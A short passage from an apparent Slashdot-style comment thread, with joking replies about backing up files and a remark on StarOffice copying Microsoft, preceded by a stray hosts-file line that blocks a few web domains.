    #hostfile 0.0.0.0 primidi.com 0.0.0.0 www.primidi.com 0.0.0.0 radio.weblogs.com
  58. In the immortal words of Strong Bad by Anonymous Coward · · Score: 0

    "Backup my files"? are you kiddin? Is that a real thing you have to do? I always thought that was just like, you know, a figure of speech. I dunno like 'wake up and smell the coffee' or 'see ya later alligator'

  59. One Step too far by mahju · · Score: 1

    I think that StarOffice adding this feature might be one step too far in copying microsoft's product....